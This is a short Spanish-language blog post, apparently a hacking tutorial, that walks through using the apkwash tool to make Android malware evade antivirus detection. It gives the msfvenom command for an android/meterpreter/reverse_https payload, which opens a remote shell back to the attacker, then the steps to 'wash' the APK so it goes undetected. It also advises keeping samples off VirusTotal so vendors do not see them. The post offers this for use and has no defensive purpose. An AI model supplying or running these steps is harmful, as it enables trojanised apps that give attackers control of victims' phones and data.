Hola amigos:
Hemos creado payloads para android, los
hemos inyectado en una aplicación conocida, pero... ¿Cómo podemos
evadir el antivirus?
Bien, nos vamos a la página
https://github.com/jbreed/apkwash
y nos descargamos apkwash.
unzip apkwash-master.zip
nos metemos en el directorio
apkwash-master
cd apkwash-master
Cambiamos los permisos de ejecución
chmod +x apkwash
Y lo movemos a /usr/local/bin/.
Creamos un payload
msfvenom -p
android/meterpreter/reverse_https LHOST=<IP> LPORT=<PORT>
-o <payload>.apk
En la primera ejecución, debería
descargar ciertas dependencias, en el caso de que no las descargue y
dé un error (como me pasó a mí), las tendréis que instalar a
mano, pero es muy fácil y rápido:
mv apktool_2.2.2.jar apktool.jar
chmod +x apktool.jar
mv apktool,jar /usr/local/bin/.
Ahora ejecutamos apkwash
apkwash payload.apk
El nombre que ha puesto al apk
indetectable es wash_payload.apk
No subáis los ficheros a
virustotal.com. Si los queréis probar, usad nodistribute.com
Si, estáis viendo otros payload.smali
en /tmp/payload/smali/com/var1/var2/ deberás actualizar el sistema.
No hay comentarios:
Publicar un comentario
Nota: solo los miembros de este blog pueden publicar comentarios.